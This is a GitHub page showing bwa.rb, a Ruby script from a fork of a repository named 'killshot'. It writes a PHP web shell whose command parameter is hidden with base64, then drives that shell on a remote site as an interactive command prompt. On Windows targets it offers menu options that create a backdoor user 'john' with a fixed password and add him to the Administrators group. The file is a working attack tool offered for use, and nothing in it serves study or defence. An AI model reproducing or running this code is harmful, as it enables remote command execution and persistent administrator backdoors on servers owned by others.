forked from bahaabdelwahed/killshot
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbwa.rb
100 lines (73 loc) · 2.12 KB
/
bwa.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#/usr/bin/ruby -w
require "open-uri"
require "colorize"
$name = ARGV[0]
$uri = ARGV[1]
if ($name == nil) and ($uri == nil ) then
puts "
** **
** **
** ** ****
** ** ** ****
** ** * ** **
** * * ** *** **
** * * ** ** *
** ** ** ** **
** ** **
* *
* *
* 0 0 *
* / @ \ *
* \__/ \__/ *
* W *
** **
*****
USAGE : ra.rb start <site>/shell.php
ra.rb shell.php
<whelp>
".red
end
if ($name != nil ) and ($uri == nil ) then
$shell = """ <?php echo system($_GET[base64_decode('Y21k')]);?>"""
$f = File.new("#{$name}","w")
$f.write($shell)
$f.close
puts "The File #{$name} Has been created succesufuly ! ".green
end
if ($name == "start") and ($uri != nil ) then
$inf = open("http://#{$uri}?cmd=ver").read
$inf2 = open("http://#{$uri}?cmd=uname -a ").read
puts "#{$inf}#{$inf2}".green
while true do
print "<@root> ".red
ARGV.clear
$command = gets.chomp
if $command == "whelp" then
puts " [0] Creat User "
puts " [1] Add User to ADMIN_GROUP"
puts " [2] Show users "
if $inf["Microsoft Windows"].nil? then
else
while true do
puts "------------------------------------ "
print "@WINDOWS :: ".green
$option = gets.chomp
puts "------------------------------------ "
if $option == "0" then
puts open("http://#{$uri}?cmd=net user john 14243454 /add ").read
puts "User Jhon Has benn created with 14243454 password ! ".green
end
if $option == "1" then
puts open("http://#{$uri}?cmd=net localgroup Administrators john /add ").read
puts "user John added to group ".green
end
if $option == "2" then
puts open("http://#{$uri}?cmd=net users ").read
end
end
end
end
$html = open("http://#{$uri}?cmd=#{$command}").read
puts $html
end
end